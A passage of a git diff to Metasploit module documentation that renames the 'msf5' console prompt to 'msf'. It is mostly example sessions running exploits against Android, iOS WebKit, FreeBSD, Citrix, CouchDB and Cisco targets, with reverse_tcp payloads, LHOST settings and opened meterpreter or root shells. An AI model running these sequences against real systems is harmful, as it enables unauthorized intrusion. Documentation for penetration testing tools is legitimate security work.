b/documentation/modules/exploit/android/local/futex_requeue.md @@ -70,18 +70,18 @@ meterpreter > getuid Server username: u0_a191 meterpreter > background [*] Backgrounding session 1... -msf5 exploit(multi/handler) > use exploit/android/local/futex_requeue -msf5 exploit(android/local/futex_requeue) > set session 1 +msf exploit(multi/handler) > use exploit/android/local/futex_requeue +msf exploit(android/local/futex_requeue) > set session 1 session => 1 -msf5 exploit(android/local/futex_requeue) > set verbose true +msf exploit(android/local/futex_requeue) > set verbose true verbose => true -msf5 exploit(android/local/futex_requeue) > set lhost 111.111.1.111 +msf exploit(android/local/futex_requeue) > set lhost 111.111.1.111 lhost => 111.111.1.111 -msf5 exploit(android/local/futex_requeue) > check +msf exploit(android/local/futex_requeue) > check [+] Android version 4.4.2 appears to be vulnerable [*] The target appears to be vulnerable. -msf5 exploit(android/local/futex_requeue) > run +msf exploit(android/local/futex_requeue) > run [*] Started reverse TCP handler on 111.111.1.111:4444 [+] Android version 4.4.2 appears to be vulnerable diff --git a/documentation/modules/exploit/android/local/janus.md b/documentation/modules/exploit/android/local/janus.md index 5dad905158..1c563940ba 100644 --- a/documentation/modules/exploit/android/local/janus.md +++ b/documentation/modules/exploit/android/local/janus.md @@ -92,7 +92,7 @@ Install [com.phonegap.camerasample](https://github.com/heavysixer/phonegap-camer An `exploit/multi/handler` was started prior to exploitation. ``` -msf5 exploit(multi/handler) > sessions +msf exploit(multi/handler) > sessions Active sessions =============== @@ -101,16 +101,16 @@ Active sessions -- ---- ---- ----------- ---------- 1 meterpreter dalvik/android u0_a80 @ localhost 192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107) -msf5 exploit(multi/handler) > use exploit/android/local/janus -msf5 exploit(android/local/janus) > set PACKAGE com.phonegap.camerasample +msf exploit(multi/handler) > use exploit/android/local/janus +msf exploit(android/local/janus) > set PACKAGE com.phonegap.camerasample PACKAGE => com.phonegap.camerasample -msf5 exploit(android/local/janus) > set SESSION 1 +msf exploit(android/local/janus) > set SESSION 1 SESSION => 1 -msf5 exploit(android/local/janus) > set LHOST 192.168.0.176 +msf exploit(android/local/janus) > set LHOST 192.168.0.176 LHOST => 192.168.0.176 -msf5 exploit(android/local/janus) > set LPORT 4445 +msf exploit(android/local/janus) > set LPORT 4445 LPORT => 4445 -msf5 exploit(android/local/janus) > run +msf exploit(android/local/janus) > run [*] Downloading APK: /data/app/com.phonegap.camerasample-1/base.apk [*] Decompiling original APK.. @@ -121,7 +121,7 @@ msf5 exploit(android/local/janus) > run [*] Rebuilding apk with meterpreter injection as /tmp/d20190824-7164-qydvgj/output.apk [*] Uploading APK: /sdcard/app.apk [*] APK uploaded -msf5 exploit(android/local/janus) > +msf exploit(android/local/janus) > ``` Please note that the user will need to manually accept the install prompt on the device (and also open the application) before a new session is opened. @@ -129,7 +129,7 @@ Please note that the user will need to manually accept the install prompt on the [*] Sending stage (72609 bytes) to 192.168.0.107 [*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800 -msf5 exploit(android/local/janus) > sessions 2 +msf exploit(android/local/janus) > sessions 2 [*] Starting interaction with 2... meterpreter > pwd @@ -221,7 +221,7 @@ resource (janus.rb)> run [*] Uploading APK: /sdcard/app.apk [*] APK uploaded [*] User should now have a prompt to install an updated version of the app -msf5 exploit(android/local/janus) > +msf exploit(android/local/janus) > ``` Install the app on the phone. For this app, clicking Open was not required, the shell was immediate. @@ -238,7 +238,7 @@ WARNING: Local file /root/metasploit-framework/data/android/meterpreter.jar is b [*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:38676) at 2019-11-05 20:12:38 -0500 [-] Unknown command: (installing. -msf5 exploit(android/local/janus) > sessions -i 2 +msf exploit(android/local/janus) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid diff --git a/documentation/modules/exploit/android/local/su_exec.md b/documentation/modules/exploit/android/local/su_exec.md index d5024acaf0..48b2730873 100644 --- a/documentation/modules/exploit/android/local/su_exec.md +++ b/documentation/modules/exploit/android/local/su_exec.md @@ -19,7 +19,7 @@ Once the module is loaded, one simply needs to set the `SESSION` option and conf An example session follows: ``` -msf5 exploit(multi/handler) > sessions +msf exploit(multi/handler) > sessions Active sessions =============== @@ -28,16 +28,16 @@ Active sessions -- ---- ---- ----------- ---------- 1 meterpreter dalvik/android u0_a80 @ localhost 192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107) -msf5 exploit(multi/handler) > use exploit/android/local/su_exec -msf5 exploit(android/local/su_exec) > set SESSION 1 +msf exploit(multi/handler) > use exploit/android/local/su_exec +msf exploit(android/local/su_exec) > set SESSION 1 SESSION => 1 -msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp +msf exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp payload => linux/aarch64/meterpreter/reverse_tcp -msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176 +msf exploit(android/local/su_exec) > set LHOST 192.168.0.176 LHOST => 192.168.0.176 -msf5 exploit(android/local/su_exec) > set LPORT 4445 +msf exploit(android/local/su_exec) > set LPORT 4445 LPORT => 4445 -msf5 exploit(android/local/su_exec) > run +msf exploit(android/local/su_exec) > run [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 192.168.0.176:4445 diff --git a/documentation/modules/exploit/apple_ios/browser/safari_jit.md b/documentation/modules/exploit/apple_ios/browser/safari_jit.md index 25efcbaebf..fae910b475 100644 --- a/documentation/modules/exploit/apple_ios/browser/safari_jit.md +++ b/documentation/modules/exploit/apple_ios/browser/safari_jit.md @@ -31,18 +31,18 @@ loading of the payload. Defaults to `false` ### iPhone 4 with iOS 7.1.2 ``` -msf5 > use exploit/apple_ios/browser/safari_jit +msf > use exploit/apple_ios/browser/safari_jit [*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp -msf5 exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1 +msf exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1 lhost => 1.1.1.1 -msf5 exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1 +msf exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1 srvhost => 1.1.1.1 -msf5 exploit(apple_ios/browser/safari_jit) > set verbose true +msf exploit(apple_ios/browser/safari_jit) > set verbose true verbose => true -msf5 exploit(apple_ios/browser/safari_jit) > run +msf exploit(apple_ios/browser/safari_jit) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. -msf5 exploit(apple_ios/browser/safari_jit) > +msf exploit(apple_ios/browser/safari_jit) > [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Using URL: http://1.1.1.1:8080/ [*] Server started. diff --git a/documentation/modules/exploit/apple_ios/browser/webkit_createthis.md b/documentation/modules/exploit/apple_ios/browser/webkit_createthis.md index 5a467cdacc..c6a1cb600d 100644 --- a/documentation/modules/exploit/apple_ios/browser/webkit_createthis.md +++ b/documentation/modules/exploit/apple_ios/browser/webkit_createthis.md @@ -25,7 +25,7 @@ The exploit should work all 64-bit devices (iPhone 5S and newer) running iOS 10 ### 64bit iPhone 5S running iOS 10.2.1 ``` -msf5 exploit(apple_ios/browser/webkit_createthis) > exploit +msf exploit(apple_ios/browser/webkit_createthis) > exploit [*] Started reverse TCP handler on 192.168.1.51:4444 [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.1.51:8080/ @@ -36,7 +36,7 @@ msf5 exploit(apple_ios/browser/webkit_createthis) > exploit [+] 192.168.1.34 webkit_createthis - Sent sha1 iOS 10 payload [*] Meterpreter session 1 opened (192.168.1.51:4444 -> 192.168.1.34:49211) at 2019-04-15 11:34:01 +0200 -msf5 exploit(apple_ios/browser/webkit_createthis) > sessions +msf exploit(apple_ios/browser/webkit_createthis) > sessions Active sessions =============== @@ -45,7 +45,7 @@ Active sessions -- ---- ---- ----------- ---------- 1 meterpreter aarch64/apple_ios uid=0, gid=0, euid=0, egid=0 @ 192.168.1.34 192.168.1.51:4444 -> 192.168.1.34:49211 (192.168.1.34) -msf5 exploit(apple_ios/browser/webkit_createthis) > sessions 1 +msf exploit(apple_ios/browser/webkit_createthis) > sessions 1 [*] Starting interaction with 1... meterpreter > pwd diff --git a/documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md b/documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md index 896642f1a1..4f0eafc3ee 100644 --- a/documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md +++ b/documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md @@ -44,8 +44,8 @@ Set this to a BSD VAX payload. Currently, only ### `fingerd` 5.1 on 4.3BSD ``` -msf5 > use exploit/bsd/finger/morris_fingerd_bof -msf5 exploit(bsd/finger/morris_fingerd_bof) > options +msf > use exploit/bsd/finger/morris_fingerd_bof +msf exploit(bsd/finger/morris_fingerd_bof) > options Module options (exploit/bsd/finger/morris_fingerd_bof): @@ -70,11 +70,11 @@ Exploit target: 0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85 -msf5 exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1 +msf exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(bsd/finger/morris_fingerd_bof) > set lhost 192.168.56.1 +msf exploit(bsd/finger/morris_fingerd_bof) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf5 exploit(bsd/finger/morris_fingerd_bof) > run +msf exploit(bsd/finger/morris_fingerd_bof) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] 127.0.0.1:79 - Connecting to fingerd diff --git a/documentation/modules/exploit/freebsd/http/citrix_dir_traversal_rce.md b/documentation/modules/exploit/freebsd/http/citrix_dir_traversal_rce.md index 87c5f4bde7..c8eff6bd52 100644 --- a/documentation/modules/exploit/freebsd/http/citrix_dir_traversal_rce.md +++ b/documentation/modules/exploit/freebsd/http/citrix_dir_traversal_rce.md @@ -9,7 +9,7 @@ This `/vpns/` directory is interesting because it contains Perl code. The script A malicious attacker can execute arbitrary commands remotely by creating a corrupted XML file that uses the Perl Template Toolkit in part of payload. ``` -msf5 exploit(freebsd/http/citrix_dir_traversal_rce) > run +msf exploit(freebsd/http/citrix_dir_traversal_rce) > run [*] Using auxiliary/scanner/http/citrix_dir_traversal as check [+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781. @@ -23,9 +23,9 @@ uid=65534(nobody) gid=65534(nobody) groups=65534(nobody) [!] This exploit may require manual cleanup of '/netscaler/portal/templates/mdjLHiHtIYmh.xml' on the target [!] This exploit may require manual cleanup of '/var/tmp/netscaler/portal/templates/mdjLHiHtIYmh.xml.ttc2' on the target [*] Exploit completed, but no session was created. -msf5 exploit(freebsd/http/citrix_dir_traversal_rce) > set payload cmd/unix/bind_perl +msf exploit(freebsd/http/citrix_dir_traversal_rce) > set payload cmd/unix/bind_perl payload => cmd/unix/bind_perl -msf5 exploit(freebsd/http/citrix_dir_traversal_rce) > run +msf exploit(freebsd/http/citrix_dir_traversal_rce) > run [*] Using auxiliary/scanner/http/citrix_dir_traversal as check [+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781. diff --git a/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md b/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md index d0086291b7..eebb7e1f0e 100644 --- a/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md +++ b/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md @@ -48,12 +48,12 @@ ### FreeBSD 9.0-RELEASE ``` - msf5 > use exploit/freebsd/local/intel_sysret_priv_esc - msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set session 1 + msf > use exploit/freebsd/local/intel_sysret_priv_esc + msf exploit(freebsd/local/intel_sysret_priv_esc) > set session 1 session => 1 - msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set lhost 123.123.123.188 + msf exploit(freebsd/local/intel_sysret_priv_esc) > set lhost 123.123.123.188 lhost => 123.123.123.188 - msf5 exploit(freebsd/local/intel_sysret_priv_esc) > run + msf exploit(freebsd/local/intel_sysret_priv_esc) > run [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 123.123.123.188:4444 diff --git a/documentation/modules/exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc.md b/documentation/modules/exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc.md index c873ea9f2e..2f2a78e474 100644 --- a/documentation/modules/exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc.md +++ b/documentation/modules/exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc.md @@ -53,13 +53,13 @@ A directory where we can write files (default: `/tmp`) ### FreeBSD 9.3-RELEASE #0 r268512 (amd64) ``` -msf5 > use exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc +msf > use exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc [*] Using configured payload bsd/x64/shell_reverse_tcp -msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set lhost 172.16.191.165 +msf exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 -msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set session 1 +msf exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set session 1 session => 1 -msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > run +msf exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > run [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 172.16.191.165:4444 @@ -86,13 +86,13 @@ FreeBSD freebsd-9-3-amd64 9.3-RELEASE FreeBSD 9.3-RELEASE #0 r268512: Thu Jul 10 ### FreeBSD 12.1-RELEASE r354233 (amd64) ``` -msf5 > use exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc +msf > use exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc [*] Using configured payload bsd/x64/shell_reverse_tcp -msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set lhost 172.16.191.165 +msf exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 -msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set session 1 +msf exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set session 1 session => 1 -msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > run +msf exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > run [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 172.16.191.165:4444 diff --git a/documentation/modules/exploit/freebsd/local/rtld_execl_priv_esc.md b/documentation/modules/exploit/freebsd/local/rtld_execl_priv_esc.md index 68bff52d99..1acc4eba10 100644 --- a/documentation/modules/exploit/freebsd/local/rtld_execl_priv_esc.md +++ b/documentation/modules/exploit/freebsd/local/rtld_execl_priv_esc.md @@ -41,14 +41,14 @@ ### FreeBSD 7.2-RELEASE (amd64) ``` - msf5 > use exploit/freebsd/local/rtld_execl_priv_esc - msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set session 1 + msf > use exploit/freebsd/local/rtld_execl_priv_esc + msf exploit(freebsd/local/rtld_execl_priv_esc) > set session 1 session => 1 - msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set verbose true + msf exploit(freebsd/local/rtld_execl_priv_esc) > set verbose true verbose => true - msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165 + msf exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(freebsd/local/rtld_execl_priv_esc) > run + msf exploit(freebsd/local/rtld_execl_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] FreeBSD version 7.2-RELEASE appears vulnerable @@ -95,14 +95,14 @@ ### FreeBSD 8.0-RELEASE (amd64) ``` - msf5 > use exploit/freebsd/local/rtld_execl_priv_esc - msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set session 1 + msf > use exploit/freebsd/local/rtld_execl_priv_esc + msf exploit(freebsd/local/rtld_execl_priv_esc) > set session 1 session => 1 - msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set verbose true + msf exploit(freebsd/local/rtld_execl_priv_esc) > set verbose true verbose => true - msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165 + msf exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(freebsd/local/rtld_execl_priv_esc) > run + msf exploit(freebsd/local/rtld_execl_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] FreeBSD version 8.0-RELEASE appears vulnerable diff --git a/documentation/modules/exploit/linux/http/apache_couchdb_cmd_exec.md b/documentation/modules/exploit/linux/http/apache_couchdb_cmd_exec.md index a1cfff7a63..880412a51c 100644 --- a/documentation/modules/exploit/linux/http/apache_couchdb_cmd_exec.md +++ b/documentation/modules/exploit/linux/http/apache_couchdb_cmd_exec.md @@ -52,8 +52,8 @@ Sometimes it requires authentication, set these options to authorize. ### Apache CouchDB on Linux ``` -msf5 > use modules/exploits/linux/http/apache_couchdb_cmd_exec.rb -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > show options +msf > use modules/exploits/linux/http/apache_couchdb_cmd_exec.rb +msf exploit(linux/http/apache_couchdb_cmd_exec) > show options Module options (exploit/linux/http/apache_couchdb_cmd_exec): @@ -87,25 +87,25 @@ Exploit target: 0 Automatic -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > set rhost 192.168.77.139 +msf exploit(linux/http/apache_couchdb_cmd_exec) > set rhost 192.168.77.139 rhost => 192.168.77.139 -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > check +msf exploit(linux/http/apache_couchdb_cmd_exec) > check [*] 192.168.77.139:5984 The target appears to be vulnerable. -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > set srvhost 192.168.77.139 +msf exploit(linux/http/apache_couchdb_cmd_exec) > set srvhost 192.168.77.139 srvhost => 192.168.77.139 -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > set srvport 8888 +msf exploit(linux/http/apache_couchdb_cmd_exec) > set srvport 8888 srvport => 8888 -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > set lhost 192.168.77.139 +msf exploit(linux/http/apache_couchdb_cmd_exec) > set lhost 192.168.77.139 lhost => 192.168.77.139 -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > exploit +msf exploit(linux/http/apache_couchdb_cmd_exec) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.77.139:4444 -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > [*] Using URL: http://192.168.77.139:8888/rXrdf2 +msf exploit(linux/http/apache_couchdb_cmd_exec) > [*] Using URL: http://192.168.77.139:8888/rXrdf2 [*] 192.168.77.139:5984 - The 1 time to exploit [*] 192.168.77.139:5984 - Sending the payload to the server... [*] Command shell session 1 opened (192.168.77.139:4444 -> 172.18.0.2:58348) at 2018-03-27 06:18:21 -0400 [*] Server stopped. -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 1 +msf exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 1 [*] Starting interaction with 1... id uid=1000(couchdb) gid=999(couchdb) groups=999(couchdb) diff --git a/documentation/modules/exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.md b/documentation/modules/exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.md index 105e2c414a..3f5839986d 100644 --- a/documentation/modules/exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.md +++ b/documentation/modules/exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.md @@ -33,7 +33,7 @@ If not set, the module will attempt to bypass authentication using the authentic #### Using a dropper / getting a native meterpreter shell (TARGET being Linux Dropper) ``` -msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > exploit +msf exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > exploit [*] Started reverse TCP handler on 192.168.1.222:4444 [*] Attempting to bypass authentication via CVE-2020-17506 (SQL injection) @@ -63,8 +63,8 @@ uid=0(root) gid=0(root) groups=0(root) #### Cmd payload : `cmd/unix/reverse_perl` ``` -msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > -msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > exploit +msf exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > +msf exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > exploit [*] Started reverse TCP handler on 192.168.1.222:4444 [*] Attempting to bypass authentication via CVE-2020-17506 (SQL injection) diff --git a/documentation/modules/exploit/linux/http/bludit_upload_images_exec.md b/documentation/modules/exploit/linux/http/bludit_upload_images_exec.md index 495470e293..1f2ed41efa 100644 --- a/documentation/modules/exploit/linux/http/bludit_upload_images_exec.md +++ b/documentation/modules/exploit/linux/http/bludit_upload_images_exec.md @@ -13,9 +13,9 @@ This module exploits a vulnerability in Bludit: A simple, fast, "secure", flat-f ## Scenarios ``` -msf5 exploit(linux/http/bludit_upload_images_exec) > check +msf exploit(linux/http/bludit_upload_images_exec) > check [*] 172.16.135.162:80 - The service is running, but could not be validated. -msf5 exploit(linux/http/bludit_upload_images_exec) > run +msf exploit(linux/http/bludit_upload_images_exec) > run [*] Started reverse TCP handler on 172.16.135.1:4444 [+] Logged in as: admin diff --git a/documentation/modules/exploit/linux/http/centreon_pollers_auth_rce.md b/documentation/modules/exploit/linux/http/centreon_pollers_auth_rce.md index b4366be6e8..2933153fde 100644 --- a/documentation/modules/exploit/linux/http/centreon_pollers_auth_rce.md +++ b/documentation/modules/exploit/linux/http/centreon_pollers_auth_rce.md @@ -28,18 +28,18 @@ Tested on: ## Scenarios ``` -msf5 > use exploit/linux/http/centreon_pollers_auth_rce -msf5 exploit(linux/http/centreon_pollers_auth_rce) > set rhosts [IP] +msf > use exploit/linux/http/centreon_pollers_auth_rce +msf exploit(linux/http/centreon_pollers_auth_rce) > set rhosts [IP] rhosts => [IP] -msf5 exploit(linux/http/centreon_pollers_auth_rce) > set username admin +msf exploit(linux/http/centreon_pollers_auth_rce) > set username admin username => admin -msf5 exploit(linux/http/centreon_pollers_auth_rce) > set password centreon +msf exploit(linux/http/centreon_pollers_auth_rce) > set password centreon password => centreon -msf5 exploit(linux/http/centreon_pollers_auth_rce) > set lhost [IP] +msf exploit(linux/http/centreon_pollers_auth_rce) > set lhost [IP] lhost => [IP] -msf5 exploit(linux/http/centreon_pollers_auth_rce) > set verbose true +msf exploit(linux/http/centreon_pollers_auth_rce) > set verbose true verbose => true -msf5 exploit(linux/http/centreon_pollers_auth_rce) > run +msf exploit(linux/http/centreon_pollers_auth_rce) > run [*] Started reverse TCP handler on XXX.XXX.XXX.XXX:4444 [*] Send authentication request. @@ -57,9 +57,9 @@ uid=48(apache) gid=48(apache) groups=48(apache),993(centreon-engine),994(centreo --or-- -msf5 exploit(linux/http/centreon_pollers_auth_rce) > set target 1 +msf exploit(linux/http/centreon_pollers_auth_rce) > set target 1 target => 1 -msf5 exploit(linux/http/centreon_pollers_auth_rce) > run +msf exploit(linux/http/centreon_pollers_auth_rce) > run [*] Started reverse TCP handler on XXX.XXX.XXX.XXX:4444 [*] Send authentication request. diff --git a/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md b/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md index 8ba14226ef..37d95b29bb 100644 --- a/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md +++ b/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md @@ -85,18 +85,18 @@ connection to the HTTP stager. Exploiting a vulnerable RV320 router with publicly accessible HTTPS web interface on TCP port 443: ``` -msf5 exploit(linux/http/cisco_rv32x_rce) > set RHOSTS 192.168.1.1 -msf5 exploit(linux/http/cisco_rv32x_rce) > set payload linux/mips64/meterpreter_reverse_tcp -msf5 exploit(linux/http/cisco_rv32x_rce) > set LHOST 192.168.1.2 -msf5 exploit(linux/http/cisco_rv32x_rce) > set RPORT 443 -msf5 exploit(linux/http/cisco_rv32x_rce) > set USE_SSL true -msf5 exploit(linux/http/cisco_rv32x_rce) > run +msf exploit(linux/http/cisco_rv32x_rce) > set RHOSTS 192.168.1.1 +msf exploit(linux/http/cisco_rv32x_rce) > set payload linux/mips64/meterpreter_reverse_tcp +msf exploit(linux/http/cisco_rv32x_rce) > set LHOST 192.168.1.2 +msf exploit(linux/http/cisco_rv32x_rce) > set RPORT 443 +msf exploit(linux/http/cisco_rv32x_rce) > set USE_SSL true +msf exploit(linux/http/cisco_rv32x_rce) > run ``` Demo example output for the module: ``` -msf5 > use exploit/linux/http/cisco_rv32x_rce -msf5 exploit(linux/http/cisco_rv32x_rce) > show options +msf > use exploit/linux/http/cisco_rv32x_rce +msf exploit(linux/http/cisco_rv32x_rce) > show options Module options (exploit/linux/http/cisco_rv32x_rce): @@ -119,17 +119,17 @@ Exploit target: -- ---- 0 LINUX MIPS64 -msf5 exploit(linux/http/cisco_rv32x_rce) > set RHOSTS 192.168.1.1 +msf exploit(linux/http/cisco_rv32x_rce) > set RHOSTS 192.168.1.1 RHOSTS => 192.168.1.1 -msf5 exploit(linux/http/cisco_rv32x_rce) > set payload linux/mips64/meterpreter_reverse_tcp +msf exploit(linux/http/cisco_rv32x_rce) > set payload linux/mips64/meterpreter_reverse_tcp payload => linux/mips64/meterpreter_reverse_tcp -msf5 exploit(linux/http/cisco_rv32x_rce) > set LHOST 192.168.1.2 +msf exploit(linux/http/cisco_rv32x_rce) > set LHOST 192.168.1.2 LHOST => 192.168.1.2 -msf5 exploit(linux/http/cisco_rv32x_rce) > set RPORT 443 +msf exploit(linux/http/cisco_rv32x_rce) > set RPORT 443 RPORT => 443 -msf5 exploit(linux/http/cisco_rv32x_rce) > set USE_SSL true +msf exploit(linux/http/cisco_rv32x_rce) > set USE_SSL true USE_SSL => true -msf5 exploit(linux/http/cisco_rv32x_rce) > run +msf exploit(linux/http/cisco_rv32x_rce) > run [*] Started reverse TCP handler on 192.168.1.2:4444 [*] Using URL: http://0.0.0.0:8080/ diff --git a/documentation/modules/exploit/linux/http/cisco_ucs_cloupia_script_rce.md b/documentation/modules/exploit/linux/http/cisco_ucs_cloupia_script_rce.md index b9ac310375..e667790873 100644 --- a/documentation/modules/exploit/linux/http/cisco_ucs_cloupia_script_rce.md +++ b/documentation/modules/exploit/linux/http/cisco_ucs_cloupia_script_rce.md @@ -69,8 +69,8 @@ shouldn't need to change it. ### Cisco UCS Director 6.7.3.0 VMware distribution ``` -msf5 > use exploit/linux/http/cisco_ucs_cloupia_script_rce -msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > options +msf > use exploit/linux/http/cisco_ucs_cloupia_script_rce +msf exploit(linux/http/cisco_ucs_cloupia_script_rce) > options Module options (exploit/linux/http/cisco_ucs_cloupia_script_rce): @@ -105,11 +105,11 @@ Exploit target: 1 Linux Dropper -msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > set rhosts 172.16.249.158 +msf exploit(linux/http/cisco_ucs_cloupia_script_rce) > set rhosts 172.16.249.158 rhosts => 172.16.249.158 -msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > set lhost 172.16.249.1 +msf exploit(linux/http/cisco_ucs_cloupia_script_rce) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > run +msf exploit(linux/http/cisco_ucs_cloupia_script_rce) > run [*] Started reverse TCP handler on 172.16.249.1:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/linux/http/cisco_ucs_rce.md b/documentation/modules/exploit/linux/http/cisco_ucs_rce.md index b3f0aaf34e..da8a1d0fec 100644 --- a/documentation/modules/exploit/linux/http/cisco_ucs_rce.md +++ b/documentation/modules/exploit/linux/http/cisco_ucs_rce.md @@ -21,12 +21,12 @@ was not tested with those products. Setup RHOST, LHOST, LPORT and run it! ``` -msf5 exploit(linux/ssh/cisco_ucs_scpuser) > use exploit/linux/http/cisco_ucs_rce -msf5 exploit(linux/http/cisco_ucs_rce) > set rhost 10.9.8.121 +msf exploit(linux/ssh/cisco_ucs_scpuser) > use exploit/linux/http/cisco_ucs_rce +msf exploit(linux/http/cisco_ucs_rce) > set rhost 10.9.8.121 rhost => 10.9.8.121 -msf5 exploit(linux/http/cisco_ucs_rce) > set lhost 10.9.8.1 +msf exploit(linux/http/cisco_ucs_rce) > set lhost 10.9.8.1 lhost => 10.9.8.1 -msf5 exploit(linux/http/cisco_ucs_rce) > run +msf exploit(linux/http/cisco_ucs_rce) > run [*] Started reverse TCP handler on 10.9.8.1:4444 [+] 10.9.8.121:443 - Successfully bypassed auth and got our admin JSESSIONID cookie! @@ -41,5 +41,5 @@ Abort session 2? [y/N] y "" [*] 10.9.8.121 - Command shell session 2 closed. Reason: User exit -msf5 exploit(linux/http/cisco_ucs_rce) > +msf exploit(linux/http/cisco_ucs_rce) > ``` diff --git a/documentation/modules/exploit/linux/http/cpi_tararchive_upload.md b/documentation/modules/exploit/linux/http/cpi_tararchive_upload.md index 323d8d7791..734a21cc36 100644 --- a/documentation/modules/exploit/linux/http/cpi_tararchive_upload.md +++ b/documentation/modules/exploit/linux/http/cpi_tararchive_upload.md @@ -63,14 +63,14 @@ If the secondary server isn't working with the primary, then the HealthMonitor s **Running the check** ``` -msf5 